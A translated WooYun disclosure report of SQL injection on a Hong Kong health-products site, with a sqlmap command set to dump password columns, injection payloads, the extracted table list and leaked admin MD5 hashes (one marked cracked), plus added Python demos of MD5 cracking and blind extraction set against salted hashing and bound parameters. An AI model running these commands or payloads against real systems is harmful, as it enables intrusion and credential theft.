
Vulnerability summary

Defect ID: wooyun-2015-0154512

Vulnerability title: SQL injection on the main site of 活力健國際有限公司 (admin and user passwords obtainable) (Hong Kong)

Affected vendor: 活力健國際有限公司

Author: 路人甲

Submitted: 2015-11-20 11:57

Fixed: 2016-01-11 15:32

Published: 2016-01-11 15:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: handed to a third-party partner organisation (HKCERT, the Hong Kong Computer Emergency Response Team Coordination Centre) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-11-20: details sent to the vendor, awaiting vendor handling
2015-11-24: vendor confirmed; details disclosed to the vendor only
2015-12-04: details disclosed to core white hats and domain experts
2015-12-14: details disclosed to regular white hats
2015-12-24: details disclosed to intern white hats
2016-01-11: details disclosed to the public

Brief description:

活力健國際有限公司 (hereafter 活力健) has, since its founding, devoted itself to researching the effects of lingzhi (reishi) spores on the human central nervous and immune systems. It not only pioneered lingzhi spore health products; its brand "2036" has become a well-known health brand in Hong Kong.
活力健 has always taken improving public health as its mission, insisting on a science-based approach and winning strong support from a number of medical schools and research institutes in China and abroad, which jointly develop and validate the medical efficacy of its products. The quality, efficacy and safety of its products are therefore guaranteed by authoritative bodies. Beyond its focus on the potent effects of lingzhi spores, 活力健 combines them with other natural substances and has developed the "Lingzhi Spore Series", whose efficacy has been confirmed by scientific research. Its flagship products, "Lingzhi Spore Essence" and "Lingzhi Spore Oil", have been shown to regulate the central nervous system and modulate the immune system, with marked effects on a range of health problems such as liver problems, improving overall health.
Drawing on years of experience researching the therapeutic uses and applications of various natural substances, 活力健 followed the "Lingzhi Spore Series" with a "Specialist Series" of function-oriented, supportive-therapy products targeting specific bodily needs, including the "High Definition Formula" for eyesight and blood-vessel protection, the "Probiotic Formula" for gut function, and the "Detox Formula" to help clear toxins from the body. More health products will follow to meet the needs of different people.
To understand and attend to customers' needs, 活力健 set up the "2036 Health Club" enquiry hotline and opened "2036 Health Information Stations" in personal-care and health retail outlets across Hong Kong, where customers can consult 2036 health ambassadors about products and personal health questions and receive detailed explanations.
Looking ahead, we will continue to develop more high-quality natural health products and offer more diverse services, honouring our commitment of "science-based, bringing health to the public".

Detailed description:

URL: http://**.**.**.**/content/index.php?lang=2&lv1=5

python sqlmap.py -u "http://**.**.**.**/content/index.php?lang=2&lv1=5" -p lv1 --technique=BE --random-agent --batch --current-user --is-dba --users --passwords --count --search -C pass

(-p lv1 restricts testing to the lv1 parameter; --technique=BE uses only the boolean-based blind and error-based techniques; --batch answers every prompt with its default; --search -C pass looks in every database for columns whose name contains "pass" and then dumps their contents, since the dump prompt defaults to yes under --batch.)

Proof of vulnerability:

---
Parameter: lv1 (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: lang=2&lv1=-4511" OR 5602=5602#
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: lang=2&lv1=-7310" OR 1 GROUP BY CONCAT(0x71716b7071,(SELECT (CASE WHEN (5757=5757) THEN 1 ELSE 0 END)),0x716a707171,FLOOR(RAND(0)*2)) HAVING MIN(0)#
---
web server operating system: Linux CentOS 5.10
web application technology: PHP 5.2.10, Apache 2.2.3
back-end DBMS: MySQL >= 5.0.0
current user: 'web91u1@localhost'
current user is DBA: False
database management system users [1]:
[*] 'web91u1'@'localhost'
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 1634 |
| TABLES | 197 |
| KEY_COLUMN_USAGE | 176 |
| STATISTICS | 176 |
| TABLE_CONSTRAINTS | 176 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126 |
| COLLATIONS | 126 |
| CHARACTER_SETS | 36 |
| SCHEMA_PRIVILEGES | 16 |
| SCHEMATA | 3 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+
Database: web91db1
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| `2036_a5_radioProgramme` | 183 |
| `2036_joinHealthClubMem` | 80 |
| `2036_a5_radioProgramme_backup` | 71 |
| `2036_a9_b3_c1_project` | 61 |
| `2036_contentTable` | 51 |
| `2036_picNum` | 50 |
| `2036_a5_topic` | 35 |
| `2036_a7_b10_newsletter` | 31 |
| `2036_layout` | 31 |
| allDay | 31 |
| `2036_a7_b11_symptom` | 28 |
| `2036_a10_homeNews` | 18 |
| `2036_a4_caseShare` | 16 |
| `2036_a8_b9_promotion` | 16 |
| `2036_nav3Lv` | 14 |
| `2036_a6_disease` | 13 |
| `2036_a8_b9_promotion_backup` | 13 |
| `2036_nav2Lv` | 13 |
| allMonth | 12 |
| `2036_a7_b11_occupation` | 11 |
| `2036_a9_b2_award` | 10 |
| `2036_nav1Lv` | 10 |
| `2036_a10_homeProduct` | 9 |
| `2036_a8_b8_productKnowledgeContent` | 9 |
| `2036_footerAward` | 9 |
| `2036_a9_b4_news` | 7 |
| allDate | 7 |
| `2036_a7_b11_education` | 6 |
| `2036_a7_b11_reachUs` | 6 |
| `2036_a7_b11_salary` | 6 |
| `2036_footerNav` | 6 |
| `2036_a10_mv` | 5 |
| `2036_a10_sideBanner` | 4 |
| `2036_a7_b11_contactMethod` | 4 |
| `2036_a9_b2_qualification` | 4 |
| `2036_a1_youtubeLink` | 3 |
| `2036_a7_b11_referralCompany` | 3 |
| `2036_a9_b27_qualification` | 3 |
| `2036_admin` | 3 |
| `2036_lang` | 3 |
| `2036_nav4Lv` | 3 |
| `2036_a3_sellSpot` | 2 |
| `2036_a5_pageImage` | 2 |
| `2036_a7_b11_gender` | 2 |
| `2036_a8_b7_pageImage` | 2 |
| `2036_a8_b9_pageImage` | 2 |
| `2036_a9_b1_txtPic` | 2 |
| `2036_a9_b3_c1_pageTxt` | 2 |
| `2036_footer1Lv` | 2 |
| `2036_footerTNC` | 2 |
| `2036_a10_homeYoutube` | 1 |
| `2036_a10_seo` | 1 |
| `2036_a10_topIcon` | 1 |
| `2036_a10_video` | 1 |
| `2036_a10_youtube` | 1 |
| `2036_a13_addTextField` | 1 |
| `2036_a1_keyVisual` | 1 |
| `2036_a2_addTextField` | 1 |
| `2036_a2_keyVisual` | 1 |
| `2036_a3_addTextField` | 1 |
| `2036_a3_keyVisual` | 1 |
| `2036_a4_addTextField` | 1 |
| `2036_a4_button` | 1 |
| `2036_a4_keyVisual` | 1 |
| `2036_a5_addTextField` | 1 |
| `2036_a5_keyVisual` | 1 |
| `2036_a6_b13_disease` | 1 |
| `2036_a6_b14_disease` | 1 |
| `2036_a6_b15_disease` | 1 |
| `2036_a6_b16_disease` | 1 |
| `2036_a6_b17_disease` | 1 |
| `2036_a6_b18_disease` | 1 |
| `2036_a6_b19_disease` | 1 |
| `2036_a6_b20_disease` | 1 |
| `2036_a6_b21_disease` | 1 |
| `2036_a6_b22_disease` | 1 |
| `2036_a6_b23_disease` | 1 |
| `2036_a6_b24_disease` | 1 |
| `2036_a6_b25_disease` | 1 |
| `2036_a6_keyVisual` | 1 |
| `2036_a6_pageImage` | 1 |
| `2036_a6_txtPic` | 1 |
| `2036_a7_b10_addTextField` | 1 |
| `2036_a7_b10_keyVisual` | 1 |
| `2036_a7_b11_addTextField` | 1 |
| `2036_a7_b11_c14_addTextField` | 1 |
| `2036_a7_b11_c14_keyVisual` | 1 |
| `2036_a7_b11_keyVisual` | 1 |
| `2036_a7_b11_pageTxt` | 1 |
| `2036_a7_b12_button` | 1 |
| `2036_a7_b12_googleMap` | 1 |
| `2036_a7_b12_keyVisual` | 1 |
| `2036_a7_b12_pageImage` | 1 |
| `2036_a7_b12_pageTxt` | 1 |
| `2036_a7_b12_txtPic` | 1 |
| `2036_a7_b26_pageTxt` | 1 |
| `2036_a7_b28_button` | 1 |
| `2036_a7_b28_googleMap` | 1 |
| `2036_a7_b28_keyVisual` | 1 |
| `2036_a7_b28_pageImage` | 1 |
| `2036_a7_b28_pageTxt` | 1 |
| `2036_a7_b29_addTextField` | 1 |
| `2036_a7_b30_addTextField` | 1 |
| `2036_a7_b30_pageTxt` | 1 |
| `2036_a7_button` | 1 |
| `2036_a7_keyVisual` | 1 |
| `2036_a7_txtPic` | 1 |
| `2036_a8_b6_c10_button` | 1 |
| `2036_a8_b6_c10_product` | 1 |
| `2036_a8_b6_c11_button` | 1 |
| `2036_a8_b6_c12_button` | 1 |
| `2036_a8_b6_c12_product` | 1 |
| `2036_a8_b6_c13_button` | 1 |
| `2036_a8_b6_c13_product` | 1 |
| `2036_a8_b6_c15_button` | 1 |
| `2036_a8_b6_c15_product` | 1 |
| `2036_a8_b6_c9_button` | 1 |
| `2036_a8_b6_c9_product` | 1 |
| `2036_a8_b6_keyVisual` | 1 |
| `2036_a8_b6_pageTxt` | 1 |
| `2036_a8_b7_c4_button` | 1 |
| `2036_a8_b7_c4_product` | 1 |
| `2036_a8_b7_c5_button` | 1 |
| `2036_a8_b7_c5_product` | 1 |
| `2036_a8_b7_c6_button` | 1 |
| `2036_a8_b7_c6_product` | 1 |
| `2036_a8_b7_c7_button` | 1 |
| `2036_a8_b7_c7_product` | 1 |
| `2036_a8_b7_c8_button` | 1 |
| `2036_a8_b7_c8_product` | 1 |
| `2036_a8_b7_keyVisual` | 1 |
| `2036_a8_b7_pageTxt` | 1 |
| `2036_a8_b8_keyVisual` | 1 |
| `2036_a8_b8_pageImage` | 1 |
| `2036_a8_b8_pageTxt` | 1 |
| `2036_a8_b9_keyVisual` | 1 |
| `2036_a9_b1_keyVisual` | 1 |
| `2036_a9_b27_addTextField` | 1 |
| `2036_a9_b27_keyVisual` | 1 |
| `2036_a9_b2_addTextField` | 1 |
| `2036_a9_b2_keyVisual` | 1 |
| `2036_a9_b2_txtPic` | 1 |
| `2036_a9_b3_c1_pageImage` | 1 |
| `2036_a9_b3_c2_pageImage` | 1 |
| `2036_a9_b3_c2_pageTxt` | 1 |
| `2036_a9_b3_c3_d1_contentTxtPic` | 1 |
| `2036_a9_b3_c3_d2_contentTxtPic` | 1 |
| `2036_a9_b3_c3_d3_contentTxtPic` | 1 |
| `2036_a9_b3_c3_pageTxt` | 1 |
| `2036_a9_b3_keyVisual` | 1 |
| `2036_a9_b3_pageTxt` | 1 |
| `2036_a9_b4_keyVisual` | 1 |
| `2036_a9_b5_keyVisual` | 1 |
| `2036_a9_b5_pageImage` | 1 |
| `2036_a9_b5_pageImageLang` | 1 |
| `2036_a9_b5_pageTxt` | 1 |
| `2036_a_TNC` | 1 |
| `2036_adminEmail` | 1 |
| `2036_footerCopyright` | 1 |
| `2036_joinClubEmail` | 1 |
| `2036_topIcon` | 1 |
| `2036_topLogo` | 1 |
| News | 1 |
| NewsNode | 1 |
| NewsNode_seq | 1 |
| Password | 1 |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: web91db1
Table: 2036_admin
[1 column]
+----------+--------------+
| Column | Type |
+----------+--------------+
| password | varchar(255) |
+----------+--------------+
Database: web91db1
Table: Password
[1 column]
+----------+--------------+
| Column | Type |
+----------+--------------+
| password | varchar(255) |
+----------+--------------+
Database: web91db1
Table: 2036_admin
[3 entries]
+----------------------------------+
| password |
+----------------------------------+
| 04494d0e25d0dc80e85c451baf5f9abe |
| bc111e1efb90a2094a34e20bee0e1844 |
| bc111e1efb90a2094a34e20bee0e1844 |
+----------------------------------+
Database: web91db1
Table: Password
[1 entry]
+------------------------------------------+
| password |
+------------------------------------------+
| 21232f297a57a5a743894a0e4a801fc3 (admin) |
+------------------------------------------+
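What the dumped password column holds, checked offline. This is an added example and not part of the report. All four values above are 32 hex characters, the shape of an unsalted MD5 digest; two of the 2036_admin rows are identical; and sqlmap's own "(admin)" annotation on the Password row shows it already matched that digest against its wordlist. The script reproduces that check with a constructed three-word guess list and contrasts it with a salted, iterated hash (PBKDF2-HMAC-SHA256 from the standard library, chosen for the example, not anything the site is known to use).

```python
"""What the dumped password column holds, checked offline.

Added example, not from the report. It takes the four values exactly as
they appear in the sqlmap output above, checks that they are unsalted MD5
digests, runs the dictionary comparison that produced sqlmap's "(admin)"
annotation, and contrasts that with a salted, iterated hash.
"""
import hashlib
import hmac
import os
import re

# The values as printed in the report (2036_admin rows, then Password).
DUMPED = [
    "04494d0e25d0dc80e85c451baf5f9abe",
    "bc111e1efb90a2094a34e20bee0e1844",
    "bc111e1efb90a2094a34e20bee0e1844",
    "21232f297a57a5a743894a0e4a801fc3",
]

# Constructed three-word guess list; a real attack uses a full wordlist.
GUESSES = ["password", "123456", "admin"]

MD5_HEX = re.compile(r"^[0-9a-f]{32}$")


def looks_like_md5(value):
    """32 lowercase hex chars: the shape of an MD5 digest, no salt field."""
    return bool(MD5_HEX.match(value))


def crack_md5(digests, guesses):
    """Offline dictionary attack: one MD5 per guess, compared to every digest.
    Returns {digest: recovered_password} for the ones that matched."""
    found = {}
    for guess in guesses:
        h = hashlib.md5(guess.encode()).hexdigest()
        for d in digests:
            if h == d:
                found[d] = guess
    return found


def duplicate_digests(digests):
    """Without a salt, two users with the same password get the same digest,
    so reuse is visible in the dump before anything is cracked."""
    return {d for d in digests if digests.count(d) > 1}


def pbkdf2_hash(password, salt=None, iterations=600_000):
    """Salted, iterated PBKDF2-HMAC-SHA256 (standard library); the stored
    string carries salt and cost so each record verifies on its own."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"{salt.hex()}${iterations}${dk.hex()}"


def pbkdf2_verify(password, stored):
    """Recompute with the stored salt and cost; constant-time compare."""
    salt_hex, iterations, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print("all MD5-shaped:", all(looks_like_md5(v) for v in DUMPED))
    print("cracked:", crack_md5(DUMPED, GUESSES))
    print("reused :", duplicate_digests(DUMPED))
    a, b = pbkdf2_hash("admin"), pbkdf2_hash("admin")
    print("same password, different records:", a != b,
          "verify:", pbkdf2_verify("admin", a))
```

The point of the contrast: with the MD5 column, one hash computation per guess is enough to test it against every row at once, and the duplicate digest reveals password reuse with no cracking at all; with a per-record salt and a work factor, neither shortcut exists.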

Remediation:

Deploy a WAF. (A WAF only filters requests; the underlying fix is to pass lv1 to the query as a bound parameter instead of splicing it into the SQL string.)
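The boolean-based blind technique behind the "B" in the sqlmap run above, and the bound-parameter fix, rebuilt as an offline simulation. This is an added example and not the vendor's PHP code or sqlmap's own: it models a page that pastes the lv1 GET parameter into a quoted string literal, which is what the payload -4511" OR 5602=5602# implies. Because the simulation runs on sqlite3 rather than MySQL, the string delimiter is ' and the trailing comment is "-- " instead of "#". The table names (2036_contentTable, Password) come from the dump; their columns and rows are constructed for the demo, and the Password row is seeded with the digest the report shows so the blind loop recovers a value you can compare against the output above.

```python
"""Boolean-based blind SQL injection, simulated offline with sqlite3.

Added example, not the vendor's code. It models index.php?lang=..&lv1=..
concatenating lv1 into a quoted literal, then drives the same kind of
true/false oracle sqlmap uses (technique B) to read a value out of another
table one character at a time, and shows the bound-parameter version of
the same query ignoring the payload.
"""
import sqlite3

# Constructed sample data. Table names (2036_contentTable, Password) come
# from the report's dump; their columns and rows are assumed for the demo.
SCHEMA = """
CREATE TABLE "2036_contentTable" (id INTEGER PRIMARY KEY, lang INTEGER,
                                  lv1 TEXT, title TEXT);
INSERT INTO "2036_contentTable" VALUES (1, 2, '5', 'Lingzhi Spore Essence');
INSERT INTO "2036_contentTable" VALUES (2, 2, '6', 'Lingzhi Spore Oil');
CREATE TABLE "Password" (id INTEGER PRIMARY KEY, password TEXT);
INSERT INTO "Password" VALUES (1, '21232f297a57a5a743894a0e4a801fc3');
"""

# sqlite has no MySQL-style '#' comment and treats "..." as identifiers,
# so the simulated app quotes with ' and the payloads end in "-- ".
TRUE_PAYLOAD = "-4511' OR 5602=5602 -- "
FALSE_PAYLOAD = "-4511' OR 5602=5603 -- "

# The value the blind loop will read out, one character per 7 requests.
TARGET = 'SELECT password FROM "Password" LIMIT 1'


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_page(conn, lang, lv1):
    """The bug: lv1 is spliced into the SQL text, so a quote breaks out."""
    sql = ('SELECT title FROM "2036_contentTable" '
           f"WHERE lang={int(lang)} AND lv1='{lv1}'")
    return [row[0] for row in conn.execute(sql)]


def hardened_page(conn, lang, lv1):
    """The fix: lv1 is bound as a parameter and can only ever be data."""
    sql = 'SELECT title FROM "2036_contentTable" WHERE lang=? AND lv1=?'
    return [row[0] for row in conn.execute(sql, (int(lang), lv1))]


def blind_extract(page, lang, subquery, max_len=64):
    """Recover the string returned by `subquery` using only whether the page
    returned any rows. Each character is found by binary search over its
    code point (0..127), i.e. exactly 7 requests per character.
    Returns (recovered_string, number_of_requests)."""
    requests = 0

    def oracle(cond):
        nonlocal requests
        requests += 1
        # '-4511' matches no row, so rows come back iff cond is true.
        return bool(page(lang, f"-4511' OR ({cond}) -- "))

    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(({subquery}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:        # past the end: unicode('') is NULL, never > mid
            break
        out += chr(lo)
    return out, requests


if __name__ == "__main__":
    conn = open_db()
    print("normal:   ", vulnerable_page(conn, 2, "5"))
    print("true  :   ", vulnerable_page(conn, 2, TRUE_PAYLOAD))
    print("false :   ", vulnerable_page(conn, 2, FALSE_PAYLOAD))
    print("hardened: ", hardened_page(conn, 2, TRUE_PAYLOAD))
    print("blind :   ", blind_extract(
        lambda lang, lv1: vulnerable_page(conn, lang, lv1), 2, TARGET))
```

Against the vulnerable page the true payload returns every row and the false one returns none, which is the whole oracle; the 32-character digest then costs 224 requests plus 7 to detect the end. Against the hardened page the same payloads are just a string that matches no lv1, so the loop stops after its first character with nothing recovered. That is the difference a WAF cannot provide: the filter has to guess which strings are dangerous, while the bound parameter makes the question irrelevant.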

Copyright notice: when reposting, credit the source as 路人甲@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 5

Confirmed: 2015-11-24 12:02

Vendor reply:

Referred to related parties.

Latest status:

None yet